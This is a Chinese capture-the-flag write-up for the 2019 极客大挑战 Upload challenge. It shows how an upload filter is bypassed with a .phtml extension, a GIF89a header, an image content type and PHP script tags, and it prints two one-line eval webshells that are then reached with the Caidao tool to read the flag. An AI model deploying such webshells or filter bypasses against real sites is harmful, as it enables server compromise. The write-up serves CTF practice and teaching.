[极客⼤挑战2019]Upload(菜⼑连接⽂件上传出现:HTTP1.1200OK) 菜⼑连接⽂件上传出现:
HTTP/1.1200 OK
Server: openresty
Date: Mon,06 Apr 202008:42:03 GMT
Content-Type: text/html接菜
Content-Length:8
Connection: close
X-Powered-By: PHP/5.5.9-1u buntu4.29
的解决过程
关于⽂件上传的题⽬,之前⼀直有做,步骤也没错,但是就是做不出来,已经好⼏题都是这样-,直到有⼀天······
上传⼀句话⽊马php,提⽰过滤了<?,⽤<script language>绕过后⼜提⽰不能是php,那先拿其他ph开头的试过去:
试到phtml成功,但是⼜提⽰要image,那这就很明显了,修改content-type为image/jpeg就可以成功上传,然后菜⼑连接(就是这⾥⼀直出错):
我寻思哪⾥出错了,但⼜没错啊,都显⽰200肯定就上传成功了,然后半个⼩时过去了,还是这个,最后发现,菜⼑连接是要⽤POST!对不起,我对我的这个⼀句话⽊马过于⾃信了,我没有检查代码,裂开。 第⼀版shell:
GIF89a?
<script language='php'>eval($_GET['v']);</script>
第⼆版shell:
GIF89a?
<script language='php'>eval($_POST['v']);</script>
然后重新操作⼀遍:
连接成功,虚拟终端cat /flag就能得到flag。
ps:所以还是要细⼼啊。
⽬前为⽌除了题⽬环境做了某些防范需要换思路,其他连不上的我做到的都是代码写错或者软件设置 写错,对了,有些题⽬对URL进⾏了base64编码,但是软件解码解了还解了还连不上可能是因为软件⾃带的base64解码有瑕疵,得⾃⼰写代码代替。如果还是连不上,那就换软件吧,后来打⽐赛我发现某些连不上的,换其他的毫⽆压⼒。
豫公网安备41160202000603
站长QQ:729038198
关于我们
投诉建议